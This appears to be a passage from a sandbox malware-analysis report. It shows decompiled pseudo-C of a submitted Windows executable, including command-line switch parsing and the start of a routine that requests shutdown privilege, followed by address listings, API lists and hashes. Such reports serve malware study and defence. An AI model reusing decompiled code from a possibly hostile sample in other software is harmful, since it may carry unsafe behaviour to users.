                                                                                                                                                                                                        															_t202 =  &_v276;
                                                                                                                                                                                                        															_v276 = _t170;
                                                                                                                                                                                                        															if(E001F5C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                        																goto L49;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                        																_t218 = 0x1f8b3e;
                                                                                                                                                                                                        																_t105 = _v276;
                                                                                                                                                                                                        																if(_t104 != 0x54) {
                                                                                                                                                                                                        																	_t218 = 0x1f8a3a;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        																E001F1680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                        																_t202 = 0x104;
                                                                                                                                                                                                        																E001F658A(_t218, 0x104, 0x1f1140);
                                                                                                                                                                                                        																if(E001F31E0(_t218) != 0) {
                                                                                                                                                                                                        																	goto L50;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	goto L106;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t111 = _t100 - 0xa;
                                                                                                                                                                                                        													if(_t111 == 0) {
                                                                                                                                                                                                        														if(_v266 != 0) {
                                                                                                                                                                                                        															if(_v266 != 0x3a) {
                                                                                                                                                                                                        																goto L49;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																_t199 = _v265;
                                                                                                                                                                                                        																if(_t199 != 0) {
                                                                                                                                                                                                        																	_t219 =  &_v265;
                                                                                                                                                                                                        																	do {
                                                                                                                                                                                                        																		_t219 = _t219 + 1;
                                                                                                                                                                                                        																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                        																		if(_t115 == 0) {
                                                                                                                                                                                                        																			 *0x1f8a2c = 1;
                                                                                                                                                                                                        																		} else {
                                                                                                                                                                                                        																			_t200 = 2;
                                                                                                                                                                                                        																			_t119 = _t115 - _t200;
                                                                                                                                                                                                        																			if(_t119 == 0) {
                                                                                                                                                                                                        																				 *0x1f8a30 = 1;
                                                                                                                                                                                                        																			} else {
                                                                                                                                                                                                        																				if(_t119 == 0xf) {
                                                                                                                                                                                                        																					 *0x1f8a34 = 1;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t209 = 0;
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																			}
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																		_t118 =  *_t219;
                                                                                                                                                                                                        																		_t199 = _t118;
                                                                                                                                                                                                        																	} while (_t118 != 0);
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															 *0x1f8a2c = 1;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														goto L50;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														_t127 = _t111 - 3;
                                                                                                                                                                                                        														if(_t127 == 0) {
                                                                                                                                                                                                        															if(_v266 != 0) {
                                                                                                                                                                                                        																if(_v266 != 0x3a) {
                                                                                                                                                                                                        																	goto L49;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                        																	if(_t129 == 0x31) {
                                                                                                                                                                                                        																		goto L76;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		if(_t129 == 0x41) {
                                                                                                                                                                                                        																			goto L83;
                                                                                                                                                                                                        																		} else {
                                                                                                                                                                                                        																			if(_t129 == 0x55) {
                                                                                                                                                                                                        																				goto L76;
                                                                                                                                                                                                        																			} else {
                                                                                                                                                                                                        																				goto L49;
                                                                                                                                                                                                        																			}
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																L76:
                                                                                                                                                                                                        																_push(2);
                                                                                                                                                                                                        																_pop(1);
                                                                                                                                                                                                        																L83:
                                                                                                                                                                                                        																 *0x1f8a38 = 1;
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        															goto L50;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t132 = _t127 - 1;
                                                                                                                                                                                                        															if(_t132 == 0) {
                                                                                                                                                                                                        																if(_v266 != 0) {
                                                                                                                                                                                                        																	if(_v266 != 0x3a) {
                                                                                                                                                                                                        																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                        																			goto L49;
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		_t201 = _v265;
                                                                                                                                                                                                        																		 *0x1f9a2c = 1;
                                                                                                                                                                                                        																		if(_t201 != 0) {
                                                                                                                                                                                                        																			_t220 =  &_v265;
                                                                                                                                                                                                        																			do {
                                                                                                                                                                                                        																				_t220 = _t220 + 1;
                                                                                                                                                                                                        																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                        																				if(_t142 == 0) {
                                                                                                                                                                                                        																					_t143 = 2;
                                                                                                                                                                                                        																					 *0x1f9a2c =  *0x1f9a2c | _t143;
                                                                                                                                                                                                        																					goto L70;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t145 = _t142 - 3;
                                                                                                                                                                                                        																					if(_t145 == 0) {
                                                                                                                                                                                                        																						 *0x1f8d48 =  *0x1f8d48 | 0x00000040;
                                                                                                                                                                                                        																					} else {
                                                                                                                                                                                                        																						_t146 = _t145 - 5;
                                                                                                                                                                                                        																						if(_t146 == 0) {
                                                                                                                                                                                                        																							 *0x1f9a2c =  *0x1f9a2c & 0xfffffffd;
                                                                                                                                                                                                        																							goto L70;
                                                                                                                                                                                                        																						} else {
                                                                                                                                                                                                        																							_t147 = _t146 - 5;
                                                                                                                                                                                                        																							if(_t147 == 0) {
                                                                                                                                                                                                        																								 *0x1f9a2c =  *0x1f9a2c & 0xfffffffe;
                                                                                                                                                                                                        																								goto L70;
                                                                                                                                                                                                        																							} else {
                                                                                                                                                                                                        																								_t149 = _t147;
                                                                                                                                                                                                        																								if(_t149 == 0) {
                                                                                                                                                                                                        																									 *0x1f8d48 =  *0x1f8d48 | 0x00000080;
                                                                                                                                                                                                        																								} else {
                                                                                                                                                                                                        																									if(_t149 == 3) {
                                                                                                                                                                                                        																										 *0x1f9a2c =  *0x1f9a2c | 0x00000004;
                                                                                                                                                                                                        																										L70:
                                                                                                                                                                                                        																										 *0x1f8a28 = 1;
                                                                                                                                                                                                        																									} else {
                                                                                                                                                                                                        																										_t209 = 0;
                                                                                                                                                                                                        																									}
                                                                                                                                                                                                        																								}
                                                                                                                                                                                                        																							}
                                                                                                                                                                                                        																						}
                                                                                                                                                                                                        																					}
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																				_t144 =  *_t220;
                                                                                                                                                                                                        																				_t201 = _t144;
                                                                                                                                                                                                        																			} while (_t144 != 0);
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	 *0x1f9a2c = 3;
                                                                                                                                                                                                        																	 *0x1f8a28 = 1;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        																goto L50;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																if(_t132 == 0) {
                                                                                                                                                                                                        																	goto L98;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	L49:
                                                                                                                                                                                                        																	_t209 = 0;
                                                                                                                                                                                                        																	L50:
                                                                                                                                                                                                        																	_t173 = _v272;
                                                                                                                                                                                                        																	if( *_t173 != 0) {
                                                                                                                                                                                                        																		goto L2;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		break;
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L106;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										L34:
                                                                                                                                                                                                        										_t209 = 0;
                                                                                                                                                                                                        										break;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L131;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if( *0x1f8a2c != 0 &&  *0x1f8b3e == 0) {
                                                                                                                                                                                                        						if(GetModuleFileNameA( *0x1f9a3c, 0x1f8b3e, 0x104) == 0) {
                                                                                                                                                                                                        							_t209 = 0;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t202 = 0x5c;
                                                                                                                                                                                                        							 *((char*)(E001F66C8(0x1f8b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t63 = _t209;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L131:
                                                                                                                                                                                                        			}


































































                                                                                                                                                                                                        0x001f5c9e
                                                                                                                                                                                                        0x001f5ca9
                                                                                                                                                                                                        0x001f5cb0
                                                                                                                                                                                                        0x001f5cb3
                                                                                                                                                                                                        0x001f5cb6
                                                                                                                                                                                                        0x001f5cb7
                                                                                                                                                                                                        0x001f5cb8
                                                                                                                                                                                                        0x001f5cbd
                                                                                                                                                                                                        0x001f6204
                                                                                                                                                                                                        0x001f5ccb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5ccb
                                                                                                                                                                                                        0x001f5cd3
                                                                                                                                                                                                        0x001f5cd7
                                                                                                                                                                                                        0x001f5cf4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5cf4
                                                                                                                                                                                                        0x001f5cf8
                                                                                                                                                                                                        0x001f5d00
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5d06
                                                                                                                                                                                                        0x001f5d06
                                                                                                                                                                                                        0x001f5d0e
                                                                                                                                                                                                        0x001f5d10
                                                                                                                                                                                                        0x001f5d12
                                                                                                                                                                                                        0x001f5d14
                                                                                                                                                                                                        0x001f5d15
                                                                                                                                                                                                        0x001f5d17
                                                                                                                                                                                                        0x001f5d49
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5d19
                                                                                                                                                                                                        0x001f5d19
                                                                                                                                                                                                        0x001f5d1d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5d3f
                                                                                                                                                                                                        0x001f5d3f
                                                                                                                                                                                                        0x001f5d4b
                                                                                                                                                                                                        0x001f5d4b
                                                                                                                                                                                                        0x001f5d4f
                                                                                                                                                                                                        0x001f5d8d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5d93
                                                                                                                                                                                                        0x001f5d93
                                                                                                                                                                                                        0x001f5d9a
                                                                                                                                                                                                        0x001f5d9d
                                                                                                                                                                                                        0x001f5d9e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5d9e
                                                                                                                                                                                                        0x001f5d51
                                                                                                                                                                                                        0x001f5d5b
                                                                                                                                                                                                        0x001f5d72
                                                                                                                                                                                                        0x001f60fb
                                                                                                                                                                                                        0x001f60fb
                                                                                                                                                                                                        0x001f6207
                                                                                                                                                                                                        0x001f620a
                                                                                                                                                                                                        0x001f620b
                                                                                                                                                                                                        0x001f620e
                                                                                                                                                                                                        0x001f6217
                                                                                                                                                                                                        0x001f5d78
                                                                                                                                                                                                        0x001f5d78
                                                                                                                                                                                                        0x001f5d80
                                                                                                                                                                                                        0x001f5d83
                                                                                                                                                                                                        0x001f5d84
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5d84
                                                                                                                                                                                                        0x001f5d5d
                                                                                                                                                                                                        0x001f5d5f
                                                                                                                                                                                                        0x001f5d62
                                                                                                                                                                                                        0x001f5d68
                                                                                                                                                                                                        0x001f5d64
                                                                                                                                                                                                        0x001f5d64
                                                                                                                                                                                                        0x001f5d64
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5d62
                                                                                                                                                                                                        0x001f5d5b
                                                                                                                                                                                                        0x001f5d4f
                                                                                                                                                                                                        0x001f5d1d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5d9f
                                                                                                                                                                                                        0x001f5d9f
                                                                                                                                                                                                        0x001f5da5
                                                                                                                                                                                                        0x001f5dab
                                                                                                                                                                                                        0x001f5dba
                                                                                                                                                                                                        0x001f6218
                                                                                                                                                                                                        0x001f621d
                                                                                                                                                                                                        0x001f6220
                                                                                                                                                                                                        0x001f6221
                                                                                                                                                                                                        0x001f6229
                                                                                                                                                                                                        0x001f6230
                                                                                                                                                                                                        0x001f6247
                                                                                                                                                                                                        0x001f626a
                                                                                                                                                                                                        0x001f6272
                                                                                                                                                                                                        0x001f6249
                                                                                                                                                                                                        0x001f6255
                                                                                                                                                                                                        0x001f625f
                                                                                                                                                                                                        0x001f6264
                                                                                                                                                                                                        0x001f6264
                                                                                                                                                                                                        0x001f6284
                                                                                                                                                                                                        0x001f5dc0
                                                                                                                                                                                                        0x001f5dc0
                                                                                                                                                                                                        0x001f5dca
                                                                                                                                                                                                        0x001f5e22
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5dcc
                                                                                                                                                                                                        0x001f5dce
                                                                                                                                                                                                        0x001f5e24
                                                                                                                                                                                                        0x001f5e24
                                                                                                                                                                                                        0x001f5e2c
                                                                                                                                                                                                        0x001f5e47
                                                                                                                                                                                                        0x001f5e4a
                                                                                                                                                                                                        0x001f61d2
                                                                                                                                                                                                        0x001f61e2
                                                                                                                                                                                                        0x001f61e7
                                                                                                                                                                                                        0x001f61ee
                                                                                                                                                                                                        0x001f61f1
                                                                                                                                                                                                        0x001f61f1
                                                                                                                                                                                                        0x001f61f8
                                                                                                                                                                                                        0x001f61f8
                                                                                                                                                                                                        0x001f5e50
                                                                                                                                                                                                        0x001f5e53
                                                                                                                                                                                                        0x001f6109
                                                                                                                                                                                                        0x001f611f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f6125
                                                                                                                                                                                                        0x001f6137
                                                                                                                                                                                                        0x001f613a
                                                                                                                                                                                                        0x001f613c
                                                                                                                                                                                                        0x001f613e
                                                                                                                                                                                                        0x001f613e
                                                                                                                                                                                                        0x001f6141
                                                                                                                                                                                                        0x001f6141
                                                                                                                                                                                                        0x001f6143
                                                                                                                                                                                                        0x001f6144
                                                                                                                                                                                                        0x001f614a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f6150
                                                                                                                                                                                                        0x001f6152
                                                                                                                                                                                                        0x001f615c
                                                                                                                                                                                                        0x001f6170
                                                                                                                                                                                                        0x001f6172
                                                                                                                                                                                                        0x001f617c
                                                                                                                                                                                                        0x001f6190
                                                                                                                                                                                                        0x001f6190
                                                                                                                                                                                                        0x001f6196
                                                                                                                                                                                                        0x001f61a5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f61ab
                                                                                                                                                                                                        0x001f61b9
                                                                                                                                                                                                        0x001f61c6
                                                                                                                                                                                                        0x001f61c6
                                                                                                                                                                                                        0x001f617e
                                                                                                                                                                                                        0x001f6180
                                                                                                                                                                                                        0x001f618a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f618a
                                                                                                                                                                                                        0x001f615e
                                                                                                                                                                                                        0x001f6160
                                                                                                                                                                                                        0x001f616a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f616a
                                                                                                                                                                                                        0x001f615c
                                                                                                                                                                                                        0x001f614a
                                                                                                                                                                                                        0x001f610b
                                                                                                                                                                                                        0x001f610e
                                                                                                                                                                                                        0x001f610e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5e59
                                                                                                                                                                                                        0x001f5e59
                                                                                                                                                                                                        0x001f5e5c
                                                                                                                                                                                                        0x001f604f
                                                                                                                                                                                                        0x001f6056
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f605c
                                                                                                                                                                                                        0x001f606e
                                                                                                                                                                                                        0x001f6071
                                                                                                                                                                                                        0x001f6073
                                                                                                                                                                                                        0x001f6075
                                                                                                                                                                                                        0x001f6075
                                                                                                                                                                                                        0x001f6078
                                                                                                                                                                                                        0x001f6078
                                                                                                                                                                                                        0x001f607a
                                                                                                                                                                                                        0x001f607b
                                                                                                                                                                                                        0x001f6081
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f6087
                                                                                                                                                                                                        0x001f6087
                                                                                                                                                                                                        0x001f608d
                                                                                                                                                                                                        0x001f609c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f60a2
                                                                                                                                                                                                        0x001f60aa
                                                                                                                                                                                                        0x001f60b2
                                                                                                                                                                                                        0x001f60b7
                                                                                                                                                                                                        0x001f60bd
                                                                                                                                                                                                        0x001f60bf
                                                                                                                                                                                                        0x001f60bf
                                                                                                                                                                                                        0x001f60d6
                                                                                                                                                                                                        0x001f60e0
                                                                                                                                                                                                        0x001f60e7
                                                                                                                                                                                                        0x001f60f5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f60f5
                                                                                                                                                                                                        0x001f609c
                                                                                                                                                                                                        0x001f6081
                                                                                                                                                                                                        0x001f5e62
                                                                                                                                                                                                        0x001f5e62
                                                                                                                                                                                                        0x001f5e65
                                                                                                                                                                                                        0x001f5fd3
                                                                                                                                                                                                        0x001f5fe9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5fef
                                                                                                                                                                                                        0x001f5fef
                                                                                                                                                                                                        0x001f5ff7
                                                                                                                                                                                                        0x001f5ffd
                                                                                                                                                                                                        0x001f6003
                                                                                                                                                                                                        0x001f6006
                                                                                                                                                                                                        0x001f6011
                                                                                                                                                                                                        0x001f6014
                                                                                                                                                                                                        0x001f603d
                                                                                                                                                                                                        0x001f6016
                                                                                                                                                                                                        0x001f6018
                                                                                                                                                                                                        0x001f6019
                                                                                                                                                                                                        0x001f601b
                                                                                                                                                                                                        0x001f6033
                                                                                                                                                                                                        0x001f601d
                                                                                                                                                                                                        0x001f6020
                                                                                                                                                                                                        0x001f6029
                                                                                                                                                                                                        0x001f6022
                                                                                                                                                                                                        0x001f6022
                                                                                                                                                                                                        0x001f6022
                                                                                                                                                                                                        0x001f6020
                                                                                                                                                                                                        0x001f601b
                                                                                                                                                                                                        0x001f6042
                                                                                                                                                                                                        0x001f6044
                                                                                                                                                                                                        0x001f6046
                                                                                                                                                                                                        0x001f604a
                                                                                                                                                                                                        0x001f5ff7
                                                                                                                                                                                                        0x001f5fd5
                                                                                                                                                                                                        0x001f5fd8
                                                                                                                                                                                                        0x001f5fd8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5e6b
                                                                                                                                                                                                        0x001f5e6b
                                                                                                                                                                                                        0x001f5e6e
                                                                                                                                                                                                        0x001f5f8b
                                                                                                                                                                                                        0x001f5f99
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5f9f
                                                                                                                                                                                                        0x001f5fa7
                                                                                                                                                                                                        0x001f5faf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5fb1
                                                                                                                                                                                                        0x001f5fb3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5fb5
                                                                                                                                                                                                        0x001f5fb7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5fb9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5fb9
                                                                                                                                                                                                        0x001f5fb7
                                                                                                                                                                                                        0x001f5fb3
                                                                                                                                                                                                        0x001f5faf
                                                                                                                                                                                                        0x001f5f8d
                                                                                                                                                                                                        0x001f5f8d
                                                                                                                                                                                                        0x001f5f8d
                                                                                                                                                                                                        0x001f5f8f
                                                                                                                                                                                                        0x001f5fc1
                                                                                                                                                                                                        0x001f5fc1
                                                                                                                                                                                                        0x001f5fc1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5e74
                                                                                                                                                                                                        0x001f5e74
                                                                                                                                                                                                        0x001f5e77
                                                                                                                                                                                                        0x001f5ea0
                                                                                                                                                                                                        0x001f5ebd
                                                                                                                                                                                                        0x001f5f79
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5f7f
                                                                                                                                                                                                        0x001f5ec3
                                                                                                                                                                                                        0x001f5ec3
                                                                                                                                                                                                        0x001f5ecc
                                                                                                                                                                                                        0x001f5ed4
                                                                                                                                                                                                        0x001f5ed6
                                                                                                                                                                                                        0x001f5edc
                                                                                                                                                                                                        0x001f5edf
                                                                                                                                                                                                        0x001f5eea
                                                                                                                                                                                                        0x001f5eed
                                                                                                                                                                                                        0x001f5f3f
                                                                                                                                                                                                        0x001f5f40
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5eef
                                                                                                                                                                                                        0x001f5eef
                                                                                                                                                                                                        0x001f5ef2
                                                                                                                                                                                                        0x001f5f34
                                                                                                                                                                                                        0x001f5ef4
                                                                                                                                                                                                        0x001f5ef4
                                                                                                                                                                                                        0x001f5ef7
                                                                                                                                                                                                        0x001f5f2b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5ef9
                                                                                                                                                                                                        0x001f5ef9
                                                                                                                                                                                                        0x001f5efc
                                                                                                                                                                                                        0x001f5f22
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5efe
                                                                                                                                                                                                        0x001f5eff
                                                                                                                                                                                                        0x001f5f02
                                                                                                                                                                                                        0x001f5f16
                                                                                                                                                                                                        0x001f5f04
                                                                                                                                                                                                        0x001f5f07
                                                                                                                                                                                                        0x001f5f0d
                                                                                                                                                                                                        0x001f5f46
                                                                                                                                                                                                        0x001f5f46
                                                                                                                                                                                                        0x001f5f09
                                                                                                                                                                                                        0x001f5f09
                                                                                                                                                                                                        0x001f5f09
                                                                                                                                                                                                        0x001f5f07
                                                                                                                                                                                                        0x001f5f02
                                                                                                                                                                                                        0x001f5efc
                                                                                                                                                                                                        0x001f5ef7
                                                                                                                                                                                                        0x001f5ef2
                                                                                                                                                                                                        0x001f5f4c
                                                                                                                                                                                                        0x001f5f4e
                                                                                                                                                                                                        0x001f5f50
                                                                                                                                                                                                        0x001f5f54
                                                                                                                                                                                                        0x001f5ed4
                                                                                                                                                                                                        0x001f5ea2
                                                                                                                                                                                                        0x001f5ea4
                                                                                                                                                                                                        0x001f5eaf
                                                                                                                                                                                                        0x001f5eaf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5e79
                                                                                                                                                                                                        0x001f5e7d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5e83
                                                                                                                                                                                                        0x001f5e83
                                                                                                                                                                                                        0x001f5e83
                                                                                                                                                                                                        0x001f5e85
                                                                                                                                                                                                        0x001f5e85
                                                                                                                                                                                                        0x001f5e8e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5e94
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5e94
                                                                                                                                                                                                        0x001f5e8e
                                                                                                                                                                                                        0x001f5e7d
                                                                                                                                                                                                        0x001f5e77
                                                                                                                                                                                                        0x001f5e6e
                                                                                                                                                                                                        0x001f5e65
                                                                                                                                                                                                        0x001f5e5c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5dd0
                                                                                                                                                                                                        0x001f5dd0
                                                                                                                                                                                                        0x001f5dd0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5dd0
                                                                                                                                                                                                        0x001f5dce
                                                                                                                                                                                                        0x001f5dca
                                                                                                                                                                                                        0x001f5dba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f5d00
                                                                                                                                                                                                        0x001f5dd9
                                                                                                                                                                                                        0x001f5e04
                                                                                                                                                                                                        0x001f61fe
                                                                                                                                                                                                        0x001f5e0a
                                                                                                                                                                                                        0x001f5e0c
                                                                                                                                                                                                        0x001f5e17
                                                                                                                                                                                                        0x001f5e17
                                                                                                                                                                                                        0x001f5e04
                                                                                                                                                                                                        0x001f6200
                                                                                                                                                                                                        0x001f6200
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharNextA.USER32(?,00000000,?,?), ref: 001F5CEE
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(001F8B3E,00000104,00000000,?,?), ref: 001F5DFC
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 001F5E3E
                                                                                                                                                                                                        • CharUpperA.USER32(-00000052), ref: 001F5EE1
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 001F5F6F
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 001F5FA7
                                                                                                                                                                                                        • CharUpperA.USER32(-0000004E), ref: 001F6008
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 001F60AA
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,001F1140,00000000,00000040,00000000), ref: 001F61F1
                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 001F61F8
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                        • String ID: "$"$:$RegServer
                                                                                                                                                                                                        • API String ID: 1203814774-25366791
                                                                                                                                                                                                        • Opcode ID: cdbdedbbb8b38699275a93bc1dc47b91ff0bc754bfce8852c30961f0c21ada53
                                                                                                                                                                                                        • Instruction ID: 91a3ae11676e241a763a5d2479446c23c191fc12a7ecaac2120a95c726d5ac82
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cdbdedbbb8b38699275a93bc1dc47b91ff0bc754bfce8852c30961f0c21ada53
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8AD13B71A08A5C5EDF35CB388C487B67B67AB26304F1840EAD786D7591DB748EC6CB40
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 60%
                                                                                                                                                                                                        			E001F1F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				int _v12;
                                                                                                                                                                                                        				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                                        				int _t28;
                                                                                                                                                                                                        				signed char _t30;
                                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                                        				void* _t40;
                                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t41 = __esi;
                                                                                                                                                                                                        				_t38 = __edi;
                                                                                                                                                                                                        				_t30 = __ecx;
                                                                                                                                                                                                        				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						if( *0x1f9a40 != 0) {
                                                                                                                                                                                                        							_pop(_t30);
                                                                                                                                                                                                        							_t44 = _t46;
                                                                                                                                                                                                        							_t13 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                        							_push(_t38);
                                                                                                                                                                                                        							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                        								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                        								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                        								_v12 = 2;
